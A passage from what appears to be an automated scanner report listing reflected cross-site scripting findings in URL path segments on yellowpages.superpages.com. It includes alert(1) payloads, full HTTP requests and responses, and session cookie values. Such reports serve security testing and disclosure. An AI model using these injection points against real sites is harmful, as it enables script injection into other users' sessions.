Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common39dde&quot;-alert(1)-&quot;ad48974274b/js/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=C15B868960CE2EE9AF292572256EADF3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:02 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsc965f&quot;-alert(1)-&quot;9b53f386972/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=6AA4650E7009D0260F993E6AB745753B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.history_remote.jsdfa09&quot;-alert(1)-&quot;556c143ae67
Server: Unspecified
Set-Cookie: JSESSIONID=AC0419B6F8814437382178A41C7FB943; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:30 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
perpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond7dc5&quot;-alert(1)-&quot;f36372d39f5/js/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=7F42488F4AB9870477CB7A261876420D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:24 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js2c12c&quot;-alert(1)-&quot;1659686fb48/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=560FCD4338D535363C1D59CFD5091B2B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:32 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.sptabs.jsfc50d&quot;-alert(1)-&quot;069a0f815e6
Server: Unspecified
Set-Cookie: JSESSIONID=96C846039494DE3D303C28223283100E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common9a2a7&quot;-alert(1)-&quot;fc51b2a718c/js/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=76DD5A47FC1A71E27DFC56B0F9C6C5FD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js48ee7&quot;-alert(1)-&quot;7ec2f5075e8/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=380CEA149465E878E1853CBE21E66C4D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/omniture_onclick.jsdf457&quot;-alert(1)-&quot;a7b7f4d7dfe
Server: Unspecified
Set-Cookie: JSESSIONID=9498FB0873E17746361EF5E2C5BDC544; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondb562&quot;-alert(1)-&quot;02c46e9b05d/js/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=03649920B5E5DB0BFD83D266F18EA9E6; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:05 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js442ba&quot;-alert(1)-&quot;a80008c80c5/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=E2823CB965F982388D18954E8635CB0A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:12 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/recently_viewed.js470ae&quot;-alert(1)-&quot;830ee1c48fb
Server: Unspecified
Set-Cookie: JSESSIONID=4D351DFDC8EF4B40214A7E149528CB6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:20 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common539eb&quot;-alert(1)-&quot;4cc78ad7314/js/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=DDC3DFA0E0BB8639F6F4C62A95C26747; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common539eb"-alert(1)-"4cc78ad7314/js/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsbb37a&quot;-alert(1)-&quot;32622685d4e/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=20AEC5B794C7F22300B4AB7C1BE8B541; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsbb37a"-alert(1)-"32622685d4e/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
